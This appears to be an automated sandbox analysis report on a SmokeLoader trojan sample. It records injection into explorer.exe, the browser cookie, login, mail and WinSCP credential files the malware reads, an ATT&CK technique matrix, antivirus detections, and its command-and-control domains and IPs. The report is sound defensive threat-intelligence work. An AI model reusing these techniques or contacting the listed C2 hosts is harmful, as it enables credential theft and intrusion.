Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\hfetwhc | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\hfetwhc | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: A579C0
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: A579C0
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: A579C0
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: A579C0
Source: explorer.exe, 00000002.00000000.1472933550.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1473970077.00000000044D0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.1472933550.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1472698024.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, hfetwhc, 00000010.00000002.3928450153.0000000000AE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1472933550.0000000001090000.00000002.00000001.00040000.00000000.sdmp, hfetwhc, 00000010.00000002.3928450153.0000000000AE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
Source: explorer.exe, 00000002.00000000.1472933550.0000000001090000.00000002.00000001.00040000.00000000.sdmp, hfetwhc, 00000010.00000002.3928450153.0000000000AE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.1475801434.000000000936E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd]1Q
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_008355EB cpuid | 7_2_008355EB
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E2112 GetSystemTimeAsFileTime,_alldiv,wsprintfA, | 7_2_007E2112
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary, | 7_2_007E2198

Stealing of Sensitive Information

Source: Yara match | File source: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7064, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6984, type: MEMORYSTR
Source: Yara match | File source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 4.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\hfetwhc, type: DROPPED
Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Source: Yara match | File source: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7064, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6984, type: MEMORYSTR
Source: Yara match | File source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 4.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\hfetwhc, type: DROPPED
MITRE ATT&CK Matrix

The matrix lists one technique per tactic and row; a number in parentheses is the count the report attaches to that technique (the number of signatures mapped to it), and techniques without a number carry no matched signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (12); Exploitation for Client Execution (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading (1); Process Injection (43); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (2); Timestomp (1); DLL Side-Loading (1); File Deletion (1); Masquerading (11); Virtualization/Sandbox Evasion (231); Process Injection (43); Hidden Files and Directories (1)
Credential Access: OS Credential Dumping (1); Credentials in Registry (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (1); File and Directory Discovery (4); System Information Discovery (117); Security Software Discovery (751); Virtualization/Sandbox Evasion (231); Process Discovery (13); Application Window Discovery (1); System Owner/User Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (22); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph

Behavior Graph ID: 1527171 | Sample: 172823964570053a59b24ac6432... | Startdate: 06/10/2024 | Architecture: WINDOWS | Score: 100

Top-level node: DNS/IP: quantumqube.org; innovixus.org. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures. Started processes: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe; hfetwhc; hfetwhc.

172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe: Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration). Injected: explorer.exe (graph node counts: 65 10).

hfetwhc: Signatures: Multi AV Scanner detection for dropped file; Creates a thread in another existing process (thread injection); Switches to a custom stack to bypass stack traces.

explorer.exe (injected): DNS/IP: innovixus.org 198.54.117.242, 443, 49718, 49719 NAMECHEAP-NETUS United States; quantumqube.org 194.87.189.87, 443, 49714, 49715 AS-REGRU Russian Federation. Dropped files: C:\Users\user\AppData\Roaming\hfetwhc, PE32; C:\Users\user\...\hfetwhc:Zone.Identifier, ASCII. Signatures: Benign windows process drops PE files; Injects code into the Windows Explorer (explorer.exe); Deletes itself after installation; 2 other signatures. Started processes: explorer.exe (graph node count: 20); explorer.exe; explorer.exe (graph node count: 103); 4 other processes.

explorer.exe (first child): Signatures: Found evasive API chain (may stop execution after checking mutex); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); 3 other signatures.

explorer.exe (second child): Signatures: Tries to harvest and steal browser information (history, passwords, etc).

explorer.exe (third child): Dropped files: C:\...\Windows.ApplicationModel.Wallet.dll, PE32; C:\Users\user\AppData\...\WalletProxy.dll, PE32; C:\Users\...\WalletBackgroundServiceProxy.dll, PE32; 11 other files (none is malicious).

Antivirus detection, submitted sample

Source | Detection | Scanner | Label | Link
172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | 47% | ReversingLabs | Win32.Trojan.SmokeLoader |
172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | 100% | Joe Sandbox ML | |

Antivirus detection, dropped files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletProxy.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletBackgroundServiceProxy.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletProxy.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\Windows.ApplicationModel.Wallet.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.mui | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\hfetwhc | 47% | ReversingLabs | Win32.Trojan.SmokeLoader |

No Antivirus matches

No Antivirus matches
URL reputation

Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe |
https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://excel.office.com | 0% | URL Reputation | safe |
http://schemas.micro | 0% | URL Reputation | safe |
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://openjsf.org/ | 0% | URL Reputation | safe |
http://jedwatson.github.io/classnames | 0% | URL Reputation | safe |
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe |
https://lodash.com/ | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://outlook.com | 0% | URL Reputation | safe |
http://underscorejs.org/LICENSE | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
https://lodash.com/license | 0% | URL Reputation | safe |
https://api.msn.com/ | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
innovixus.org | 198.54.117.242 | true | true |  | unknown
quantumqube.org | 194.87.189.87 | true | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://quantumqube.org/index.php | true |  | unknown
https://quantumqube.org/index.php | true |  | unknown
http://innovixus.org/index.php | true |  | unknown
https://innovixus.org/index.php | true |  | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.msn.com/v1/news/Feed/Windows? | explorer.exe, 00000002.00000000.1475801434.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://duckduckgo.com/chrome_newtab | explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.dr | false | URL Reputation: safe | unknown
https://powerpoint.office.comer | explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://duckduckgo.com/ac/?q= | explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.dr | false | URL Reputation: safe | unknown
https://android.notify.windows.com/iOSA4 | explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/ | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.dr | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://excel.office.com | explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1 | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
http://schemas.micro | explorer.exe, 00000002.00000000.1474886102.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1474899724.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1473187872.0000000002C80000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
http://quantumqube.org/application/x-www-form-urlencodedMozilla/5.0 | explorer.exe, 00000007.00000002.2375965405.000000000330C000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
https://wns.windows.com/EM0 | explorer.exe, 00000002.00000000.1478526429.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://github.com/jsstyles/css-vendor | explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.dr | false |  | unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.dr | false | URL Reputation: safe | unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
http://quantumqube.org/ndex.php | explorer.exe, 00000007.00000002.2375965405.00000000032C4000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://www.microsoft.c | explorer.exe, 00000002.00000000.1475801434.0000000009237000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09 | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://android.notify.windows.com/iOSd | explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://openjsf.org/ | explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.dr | false | URL Reputation: safe | unknown
http://jedwatson.github.io/classnames | explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.dr | false | URL Reputation: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
http://quantumqube.org/index.php. | explorer.exe, 0000000D.00000003.3028814712.000000000526C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2721237512.000000000526C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3328845519.0000000005270000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
http://quantumqube.org/ | explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.0000000003304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.000000000330C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.00000000032E2000.00000004.00000020.00020000.00000000.sdmp | true |  | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.dr | false |  | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://lodash.com/ | explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.dr | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.dr | false | URL Reputation: safe | unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.dr | false | URL Reputation: safe | unknown
http://ns.adobeS | explorer.exe, 00000002.00000000.1473694819.0000000004405000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://outlook.com | explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
http://underscorejs.org/LICENSE | explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.dr | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.dr | false | URL Reputation: safe | unknown
